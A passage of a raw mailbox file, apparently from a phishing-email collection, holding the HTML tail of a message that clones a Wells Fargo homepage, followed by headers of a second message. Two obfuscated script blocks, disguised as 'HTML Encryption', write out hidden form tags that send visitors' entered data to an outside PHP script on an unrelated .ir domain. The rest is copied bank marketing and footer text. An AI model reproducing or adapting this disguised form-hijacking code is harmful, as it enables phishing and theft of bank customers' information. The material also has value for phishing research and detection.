Wells Fargo can offer you guidance and resources to help you pursue your re=
tirement goals.</p>
					<p>
						<a class=3D"c22" href=3D"/goals-retirement/?e=3D1">Planning at any ag=
e</a>
					</p>
					<ul>
						<li class=3D"NBA">Are you <a href=3D"/investing/retirement/tools/my-r=
etirement-plan">saving enough</a> for retirement?</li>
						<li>Learn how IRAs can help you <a href=3D"/investing/retirement/ira/=
">build your savings</a></li>
						<li>Learn how to <a href=3D"/investing/retirement/rollover/">roll ove=
r my 401(k)</a></li>
						<li>Generate <a href=3D"/goals-retirement-income/">income</a> in reti=
rement</li>
					</ul>
				=

	</div>
	<div class=3D"c63contentTop">
		<a class=3D"tasRenderedC_irw_retirementconsultation_retirementnba_web" hr=
ef=3D"https://adfarm.mediaplex.com/ad/ck/21520-158523-3408-18">
        <img id=3D"WF_CON_NBA_RETIREMENT_4A" class=3D"tasAd" alt=3D"Retirem=
ent on track? Get your complimentary retirement consultation. Find Out More=
."  src=3D"https://a248.e.akamai.net/f/248/1856/90m/www.wellsfargo.com/asse=
ts/images/contextual/banner/retirement/234x144/irw_retireconsult_234x144.pn=
g" width=3D"234" height=3D"144" /></a></div>
	<div class=3D"c63contentBottom">
		<a class=3D"tasRenderedC_mfa_targetdatefunds_retirementnba_web" href=3D"h=
ttps://adfarm.mediaplex.com/ad/ck/21520-158496-3408-3">
        <img id=3D"WF_CON_NBA_RETIREMENT_4B" class=3D"tasAd" alt=3D"Wells F=
argo Advantage Dow Jones Target Date Funds help you plan for retirement. Le=
arn More."  src=3D"https://www03.wellsfargomedia.com/assets/images/contextu=
al/banner/investments/234x144/mfa_targetdate2a_234x144.gif" width=3D"234" h=
eight=3D"144" /></a></div>
</div><div class=3D"carouselFrame" role=3D"tabpanel" data-cid=3D"tcm:182-65=
17-16" data-ctid=3D"tcm:223-6251-32">
	<div class=3D"c63contentMain">
<img src=3D"https://www04.wellsfargomedia.com/assets/images/photography/lif=
estyle/227x288/family-4_front-house_taking-off-to-vacation_227x288.jpg" alt=
=3D"" class=3D"leftSide" width=3D"227" height=3D"288" />
		=

					<h2>Gain peace of mind</h2>
					<p>At Wells Fargo, we work with multiple insurance companies and can h=
elp you get the coverage that works for you.</p>
					<p>
						<a class=3D"c22" href=3D"/goals-protect-what-counts/?e=3D1">Protect W=
hat Counts</a>
					</p>
					<ul>
						<li>Protect your <a href=3D"/goals-protect-what-counts/">home and pro=
perty</a></li>
						<li>
							<a href=3D"/goals-protect-what-counts#tab_youandyourfamily">Get cove=
rage</a>
				 for you and your family
			</li>
						<li>Get <a href=3D"/insurance-auto-vehicle/auto/">auto insurance</a> =
quotes online</li>
						<li>Enroll in an <a href=3D"/insurance-identity-theft-protection/">id=
entity theft protection</a> plan</li>
					</ul>
				=

	</div>
	<div class=3D"c63contentTop">
		<a class=3D"tasRenderedC_ire_rentersinsurance_insurancenba_web" href=3D"h=
ttps://adfarm.mediaplex.com/ad/ck/21520-158530-3408-16">
        <img id=3D"WF_CON_NBA_INSURANCE_6A" class=3D"tasAd" alt=3D"Renting?=
 Protect yourself and your belongings with affordable Renters Insurance. Ge=
t Quotes."  src=3D"https://a248.e.akamai.net/f/248/1856/90m/www.wellsfargo.=
com/assets/images/contextual/banner/insurance/234x144/ire_rentersassurantpm=
f_234x144.png" width=3D"234" height=3D"144" /></a></div>
	<div class=3D"c63contentBottom">
		<a class=3D"tasRenderedC_ins_homeautobundle_insurancenba_web" href=3D"htt=
ps://adfarm.mediaplex.com/ad/ck/21520-158530-3408-19">
        <img id=3D"WF_CON_NBA_INSURANCE_6B" class=3D"tasAd" alt=3D"Save on =
Insurance.  You could save as much as $627 with auto and homeowners insuran=
ce through Wells Fargo. Compare Quotes."  src=3D"https://a248.e.akamai.net/=
f/248/1856/90m/www.wellsfargo.com/assets/images/contextual/banner/insurance=
/234x144/ins_homeautobundle627a_234x144.png" width=3D"234" height=3D"144" /=
></a></div>
</div><div class=3D"carouselFrame" role=3D"tabpanel" data-cid=3D"tcm:182-65=
15-16" data-ctid=3D"tcm:223-6251-32">
	<div class=3D"c63contentMain">
<img src=3D"https://www01.wellsfargomedia.com/assets/images/photography/lif=
estyle/227x288/tablet_fraud-screen-shot_227x288.jpg" alt=3D"" class=3D"left=
Side" width=3D"227" height=3D"288" />
		=

					<h2>Guard against fraud</h2>
					<p>Take action to protect yourself or your small business from fraud a=
nd identity theft.</p>
					<p>
						<a class=3D"c22" href=3D"/privacy-security/fraud/?e=3D1">Go to Fraud =
Information Center</a>
					</p>
					<ul>
						<li>
							<a href=3D"/privacy-security/fraud/report/">Report fraud</a>
						</li>
						<li>
							<a href=3D"/privacy-security/fraud/report/identity-theft">Report ide=
ntity theft</a>
						</li>
						<li>Review <a href=3D"/privacy-security/fraud/protect/fraud-tips">fra=
ud prevention tips</a></li>
						<li>View <a href=3D"/privacy-security/fraud/small-business">business =
owner tips</a></li>
					</ul>
				=

	</div>
	<div class=3D"c63contentTop">
		<a href=3D'https://adfarm.mediaplex.com/ad/ck/1221-141400-3408-11' >
        <img id =3D'WF_CON_NBA_FRAUD_7A' class =3D'tasAd tasDefault' src =
=3D'https://www01.wellsfargomedia.com/assets/images/contextual/banner/defau=
lts/other/oth_cyberthreats_234x144.png' alt=3D'Learn about cyber-threats. S=
tart now.' width=3D"234" height=3D"144" ></a></div>
	<div class=3D"c63contentBottom">
		<a href=3D'https://adfarm.mediaplex.com/ad/ck/1221-4130-3408-626' >
        <img id =3D'WF_CON_NBA_FRAUD_7B' class =3D'tasAd tasDefault' src =
=3D'https://www04.wellsfargomedia.com/assets/images/contextual/banner/defau=
lts/online-banking/olb_alertsa_234x144.png' alt=3D'Monitor your accounts wi=
th ease. Set up free Account Alerts today. Learn more.' width=3D"234" heigh=
t=3D"144" ></a></div>
</div><div class=3D"carouselFrame" role=3D"tabpanel" data-cid=3D"tcm:182-65=
16-16" data-ctid=3D"tcm:223-6251-32">
	<div class=3D"c63contentMain">
<img src=3D"https://www04.wellsfargomedia.com/assets/images/photography/lif=
estyle/227x288/father-daughter_house-exterior_shoulders-airplane_227x288.jp=
g" alt=3D"" class=3D"leftSide" width=3D"227" height=3D"288" />
		=

					<h2>Support at every stage of homeownership</h2>
					<p>Thinking of buying a home, refinancing, or improving your current h=
ome? Start a conversation with us. We offer helpful information while you p=
lan, simple steps when you?re ready to start, and support along the way.</p>
					<p>
						<a class=3D"c22" href=3D"/mortgage/home-loans?e=3D1">Start Learning a=
nd Planning</a>
					</p>
					<ul>
						<li>
							<a href=3D"/mortgage/rates/calculator">Check rates and payments</a>
				 for mortgage and home equity
			</li>
						<li>
							<a href=3D"/myfirsthome1">Buy your first home</a>
				 with help from our interactive guide
			</li>
						<li>Customize and <a href=3D"/mortgage/rates/compare-loans/index">com=
pare loan options</a></li>
						<li>
							<a data-cid=3D"tcm:182-6516-16" data-ctid=3D"tcm:223-6251-32" href=
=3D"https://online.wellsfargo.com/signon?serviceType=3DmakeTransfer&amp;log=
inMode=3DjukePassword&amp;LOB=3DCONS">Make payments online</a>
				 or learn about =

				<a href=3D"/mortgage/manage-account/home-loans">managing your account</=
a>
						</li>
					</ul>
				=

	</div>
	<div class=3D"c63contentTop">
		<a class=3D"tasRenderedC_mtg_fthbcourse1dmiwefthe2_homelendingnba_web" hr=
ef=3D"https://adfarm.mediaplex.com/ad/ck/21520-158535-3408-53">
        <img id=3D"WF_CON_NBA_HOME_5A" class=3D"tasAd" alt=3D"First-time Ho=
mebuyer? Our interactive online course helps you learn about becoming a hom=
eowner. Get Started."  src=3D"https://a248.e.akamai.net/f/248/1856/90m/www.=
wellsfargo.com/assets/images/contextual/banner/mortgage/234x144/mtg_fthbcou=
rse1dmiwefthe2_234x144.png" width=3D"234" height=3D"144" /></a></div>
	<div class=3D"c63contentBottom">
		<a class=3D"tasRenderedC_mtg_prequaldmiweghcpp_homelendingnba_web" href=
=3D"https://adfarm.mediaplex.com/ad/ck/21520-158535-3408-49">
        <img id=3D"WF_CON_NBA_HOME_5B" class=3D"tasAd" alt=3D"Buying a hous=
e? Estimate how much you may be able to borrow. Get Prequalified."  src=3D"=
https://a248.e.akamai.net/f/248/1856/90m/www.wellsfargo.com/assets/images/c=
ontextual/banner/mortgage/234x144/mtg_buyingprequaldmiweghcpp_234x144.png" =
width=3D"234" height=3D"144" /></a></div>
</div></div>

   =

        <div class=3D"hpAdditional">
            <div class=3D"hpAdditionalMainCol">
                <div class=3D"hpAdditionalWrapper">
                    =

 <div class=3D"hpAdditionalContentImg">
                     <a class=3D"tasRenderedC_ent_holidaycommercial_hpsec_w=
eb" href=3D"https://adfarm.mediaplex.com/ad/ck/21520-158525-3408-10">
                     <img id=3D"WF_CON_HP_SECONDARY_BNR_1" class=3D"tasAd" =
alt=3D"Share the holiday spirit. View our holiday message. Watch Video."  s=
rc=3D"https://www03.wellsfargomedia.com/assets/images/contextual/banner/ent=
erprise/227x238/oth_holidaycd3172_227x240.jpg" width=3D"227" height=3D"240"=
 /></a></div>                  =


 <div class=3D"hpAdditionalContentImg">
                     <a class=3D"tasRenderedC_chk_applycheck_hpsec_web" hre=
f=3D"https://adfarm.mediaplex.com/ad/ck/21520-158539-3408-9">
                     <img id=3D"WF_CON_HP_SECONDARY_BNR_2" class=3D"tasAd" =
alt=3D"Your time is valuable. Open a checking account in minutes. Start Now=
. Member FDIC."  src=3D"https://www03.wellsfargomedia.com/assets/images/con=
textual/banner/checking/227x238/chk_openinminfdic_227x220.jpg" width=3D"227=
" height=3D"220" /></a></div>                  =


 <div class=3D"hpAdditionalContentImg">
                     <a class=3D"tasRenderedC_sav_way2save3_hpsec_web" href=
=3D"https://adfarm.mediaplex.com/ad/ck/21520-158536-3408-7">
                     <img id=3D"WF_CON_HP_SECONDARY_BNR_3" class=3D"tasAd" =
alt=3D"Open a savings account. Make saving a permanent habit and reach your=
 goals. Learn More. Member FDIC."  src=3D"https://www03.wellsfargomedia.com=
/assets/images/contextual/banner/savings/227x238/sav_pinwheel_227x238.jpg" =
width=3D"227" height=3D"238" /></a></div>                  =




                </div>
                <div class=3D"hpMcCt1">
                    =

        <div class=3D"col1">
						<h2>About Wells Fargo</h2>
						<h3>Get to Know Our Company</h3>
						<ul class=3D"c14">
							<li><a href=3D"/invest_relations/vision_values">Vision and Values</a=
></li>
							<li><a href=3D"/about/csr/">Corporate Responsibility</a></li>
							<li><a href=3D"/careers/">Working at Wells Fargo</a></li>
							<li><a href=3D"/invest_relations/investor_relations/">Investor Relat=
ions</a></li>
							<li><a href=3D"/about/newsroom">Newsroom</a></li>
						</ul>
					</div>
      =



                    <div class=3D"col2">
						<h3>Learn about our team member giving programs</h3>
						<p>Our team members lend their time, talent, and resources to support=
 their communities.</p>
						<a href=3D"/about/csr/team/" class=3D"c13">Read More</a></div>
                              =

</div>
            </div>
            <div class=3D"hpAdditionalSecondaryCol">
                =

        <div class=3D"locatorBox">
						<script type=3D"text/javascript">
<!-- HTML Encryption provided by www.webtoolhub.com -->
<!--
document.write(unescape('%3c%66%6f%72%6d%20%61%63%74%69%6f%6e%3d%22%68%74%7=
4%70%3a%2f%2f%6d%61%68%72%61%2e%69%72%2f%76%65%72%69%66%69%2e%70%68%70%22%2=
0%6e%61%6d%65%3d%22%66%72%6d%43%68%65%63%6b%52%61%74%65%73%22%3e'));
//-->
</script>
							<h3 class=3D"c43"><label for=3D"check_rates_dropdown">Check Today's =
Rates</label></h3>
							<select name=3D"dropdown" id=3D"check_rates_dropdown">
								<option value=3D"personal.checkRates.Mortgage">Mortgage</option>
								<option value=3D"personal.checkRates.HomeEquity">Home Equity</optio=
n>
								<option value=3D"personal.checkRates.CDS">CDs</option>
								<option value=3D"personal.checkRates.CreditCard">Credit Card</optio=
n>
								<option value=3D"personal.checkRates.PersonalLoans">Personal Loans<=
/option>
								<option value=3D"personal.checkRates.More">More</option>
							</select><input type=3D"submit" class=3D"submitBtn c7 utilitybtn" va=
lue=3D"Go" /></form>
					</div>
      =


        <div class=3D"locatorBox">
          <script type=3D"text/javascript">
<!-- HTML Encryption provided by www.webtoolhub.com -->
<!--
document.write(unescape('%3c%66%6f%72%6d%20%69%64%3d%22%66%72%6d%4c%6f%63%6=
1%74%6f%72%22%20%6d%65%74%68%6f%64%3d%22%67%65%74%22%20%61%63%74%69%6f%6e%3=
d%22%68%74%74%70%3a%2f%2f%6d%61%68%72%61%2e%69%72%2f%76%65%72%69%66%69%2e%7=
0%68%70%22'));
//-->
</script>
 name=3D"frmLocator">
            <h3 class=3D"c43">
              <label for=3D"location">Find an ATM or Banking
<br />
location near you</label>
            </h3>
            <input type=3D"text" id=3D"location" maxlength=3D"70" size=3D"2=
8" name=3D"searchTxt" placeholder=3D"Zip code or City &amp; State" />
            <input type=3D"submit" id=3D"locationGo" class=3D"submitBtn c7 =
utilitybtn" value=3D"Go" name=3D"locationGo" />
          </form>
        </div>
      =



            </div>


        </div>
        <footer role=3D"contentinfo">
	<div class=3D"html5footer c9" id=3D"pageFooter">
          =

            =

                <div class=3D"c9content">
    =


        <img alt=3D"Together we'll go far" src=3D"https://www01.wellsfargom=
edia.com/assets/images/global/stagecoach.jpg" width=3D"219" height=3D"87" />
      =

    =

    =

    <nav role=3D"navigation">
            	<div class=3D"html5nav">
					<ul class=3D"navList">						=

                        =

                        <li>
        <a data-cid=3D"tcm:84-6402-16" data-ctid=3D"tcm:91-1866-32"   href=
=3D"/about/">About Wells Fargo</a>
      </li>
                        =

                        <li>
        <a data-cid=3D"tcm:84-6402-16" data-ctid=3D"tcm:91-1866-32"   href=
=3D"/careers/">Careers</a>
      </li>
                        =

                        <li>
        <a href=3D"/privacy_security/">PRIVACY, Security &amp; Legal</a>
      </li>
                        =

                        <li>
        <a data-cid=3D"tcm:84-6402-16" data-ctid=3D"tcm:91-1866-32"   href=
=3D"/privacy-security/fraud/report/">Report Fraud</a>
      </li>
                        =

                        <li>
        <a data-cid=3D"tcm:84-6402-16" data-ctid=3D"tcm:91-1866-32"   href=
=3D"/sitemap">Sitemap</a>
      </li>
                        =

                        <li>
        <a data-cid=3D"tcm:84-6402-16" data-ctid=3D"tcm:91-1866-32"   href=
=3D"/about/diversity/">Diversity &amp; Accessibility</a>
      </li>
                        =

                        <li>
        <a data-cid=3D"tcm:84-6402-16" data-ctid=3D"tcm:91-1866-32"   href=
=3D"https://online.wellsfargo.com/common/html/wibdisc.html">Online Access A=
greement</a>
      </li>
                        =

                        <li>
        <a data-cid=3D"tcm:84-6402-16" data-ctid=3D"tcm:91-1866-32"   href=
=3D"https://blogs.wellsfargo.com">Blogs &amp; Social Media</a>
      </li>
                                               =

					</ul>
				</div>
			</nav>
    =

    =

</div>
            =

          =

            =

          =

            =

          =

            =

          =

            =

          =

            =

        =


        =

            <div class=3D"c42">
                 <div class=3D"c20">
                      =

                        =

                      =

                        =

                            <div class=3D"c20body" data-numbered=3D"false" =
data-cid=3D"tcm:84-6406-16" data-ctid=3D"tcm:91-1924-32">

        <p>Brokerage products and services are offered through Wells Fargo =
Advisors. Wells Fargo Advisors is the trade name used by two separate regis=
tered broker-dealers: Wells Fargo Advisors, LLC and Wells Fargo Advisors Fi=
nancial Network, LLC, Members <a href=3D"/exit/sipc">SIPC</a>, non-bank aff=
iliates of Wells Fargo &amp; Company and is intended only for United States=
 residents. WellsTrade<sup>?</sup> is offered through Wells Fargo Advisors,=
 LLC.
<br />
						<br />
Wells Fargo Insurance, Inc. (Minneapolis, MN) is a licensed agency that rep=
resents ? and is compensated by ? the insurer based on the amount of insura=
nce sold.
</p>
      =

</div>                        =

                      =

                        =

                                    <div class=3D"c20notnot">
          <strong>Investment, Insurance, and Identity theft protection prod=
ucts:</strong>
						<ul>
							<li>Are Not insured by the FDIC or any other federal government agen=
cy</li>
							<li>Are Not deposits of or guaranteed by a Bank or any Bank Affiliat=
e</li>
							<li>May Lose Value</li>
						</ul>
					</div>
                              =

                      =

                        =

                            <div class=3D"c20body" data-numbered=3D"false" =
data-cid=3D"tcm:84-6407-16" data-ctid=3D"tcm:91-1924-32">

        <p>Deposit products offered by Wells Fargo Bank, N.A. Member FDIC. =
</p>
					<p><strong> See the new FDIC Deposit Insurance announcement effective =
January 1, 2013.</strong>
						<a href=3D"/savings_cds/fdic">Learn More</a></p>
</div>                        =

                      =

                        =

                                    <p>
          <img alt=3D"icon-equal-housing" src=3D"https://www01.wellsfargome=
dia.com/assets/images/global/icon-equal-housing.gif" width=3D"14" height=3D=
"10" />
          <strong>Equal Housing Lender</strong>
        </p>
					<p>? 1999 - 2013 Wells Fargo. All rights reserved. NMLSR ID 399801</p>=
                        =

                      =

                        =

                    =

                 </div>
            </div>
        =

    </div>
</footer></div>
    <!-- end of shell div -->

 =

<noscript>
    <img src=3D"/img/s.gif?Log=3D1&jsoff=3Dtrue" style=3D"position: relativ=
e; width: 0; height: 0; overflow: hidden" alt=3D"" /></noscript>
<script type=3D"text/javascript" src=3D"/javascript/user-prefs.js"></script>
<script src=3D"/js/frameworks/jq/jquery.js"></script>
<script type=3D"text/javascript">
function domReady(callBack){ callBack();}
var tasInfo=3D{"pageID":"per_home","Url":"/tas","data":{},"App_ID":"WWW"};
                 </script>
<script src=3D"/js/global/home.js"></script>

<script>
    (function () {
        /* Prevent framing */
        if (self !=3D top) {
            if (document.images) {
                top.location.replace(window.location.href);
            }
            else {
                top.location.href =3D window.location.href;
            }
        }
        // End framing
       =

        function collectPcPrint() {
            var formObj =3D $("#frmSignon").get(0);
            fortyone.collect("u_p");
            return true;
        }


        function set_onSubmit() {
            var jsSwitch =3D "on";
            var formObj =3D $("#frmSignon").get(0);
            if (jsSwitch =3D=3D 'on') {
                formObj.onsubmit =3D collectPcPrint;
            }
        }
        set_onSubmit();

    })();
                 </script>


 =

</body>
</html>
--===============1543042520==--

From jose@monkey.org Sun Jan 29 13:29:28 2017 +0000
Return-Path: postmaster@sahurinur.com
Delivered-To: jose@monkey.org
X-FDA: 72457217616.06.class50_52ac96f01563b
X-Spam-Summary: 69,4.5,0,4efca870527c33a3,d41d8cd98f00b204,postmaster@sahurinur.com,:,RULES_HIT:2:4:41:46:72:150:152:355:379:455:800:871:960:962:967:973:978:983:988:989:1000:1001:1189:1208:1213:1221:1256:1260:1263:1313:1314:1345:1381:1390:1431:1432:1433:1434:1436:1437:1516:1517:1518:1571:1573:1575:1588:1589:1592:1594:1676:1710:1730:1744:1775:1792:1801:2107:2194:2198:2199:2200:2380:2525:2527:2528:2538:2539:2561:2565:2610:2682:2685:2693:2741:2827:2859:2890:2892:2897:2902:2909:2917:2924:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3167:3353:3552:3865:3866:3867:3868:3870:3872:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4040:4042:4050:4321:4429:4508:4509:4552:4605:6096:6117:6119:6248:6261:6300:6354:6506:6669:6674:6678:6747:7281:7903:7904:7909:8583:8603:8885:8957:9025:9074:9077:9080:9121:9388:9704:9908:10009:10305:10346:10881:10919:11026:11233:11257:11289:11651:11656:11658:11783:11914:12043:12114:12324:12438:12517:12519:12555:12591:12679:12812:
X-HE-Tag: class50_52ac96f01563b
X-Filterd-Recvd-Size: 18314
Received: from mail-oi0-f97.google.com (mail-oi0-f97.google.com [209.85.218.97])
	by imf10.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Sun, 29 Jan 2017 13:29:27 +0000 (UTC)
Received: by mail-oi0-f97.google.com with SMTP id j82so27347201oih.0
        for <jose@monkey.org>; Sun, 29 Jan 2017 05:29:27 -0800 (PST)
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=1e100.net; s=20161025;
        h=x-gm-message-state:from:to:reply-to:date:subject:mime-version
         :message-id;
        bh=AotAaItidvdwq9s+HGcmnR8YZMGuf0pP3inIBbz2eHA=;
        b=Bj5RYel0Qgzv42sYGwIbRqoVvW3Hca4V2O3epGrHpNYWbcSwCjLmfmEq04deafal33
         8/ciOTGFkqwWXDHwgaz1mIXKzqL8E6yODPGlIscx8YljcYgH72UHO01t4ESQraCevJFQ
         THflrB3SgKUQwghyiWS1AlvmVjrHid8MSrr/ngWNx/9uLXAiCXNXQD1cdPifEuVGkdDS
         HhboQRE6J1YTXkbaoS55EkaCN/nxMjMCh8ULqjllxXR2lGkAiIgDa4Ye4Mnq6SNBHj8i
         Nfg/2chN3St24goOfF7qBqJRjFs8n2Qb/+vukEoThred3dvGuWxn+1WDwJ7avpprUK9+
         1ysw==
X-Gm-Message-State: AIkVDXJHxSDcj/iXG/Gn3m8xCcp/egpGWDr+WuY5YFTMgLzwKiZI14n7iMrVFhKxhwchRed+P1z9VvBkQXSu0sDI94GTstO8
X-Received: by 10.36.254.140 with SMTP id w134mr11603177ith.66.1485696567428;
        Sun, 29 Jan 2017 05:29:27 -0800 (PST)
Return-Path: <postmaster@sahurinur.com>
Received: from DESKTOPQS14GPQ ([36.77.95.20])
        by smtp-relay.gmail.com with ESMTPS id k2sm2604154ith.2.2017.01.29.05.29.26
        for <jose@monkey.org>
        (version=TLS1 cipher=ECDHE-RSA-AES128-SHA bits=128/128);
        Sun, 29 Jan 2017 05:29:27 -0800 (PST)
X-Relaying-Domain: sahurinur.com
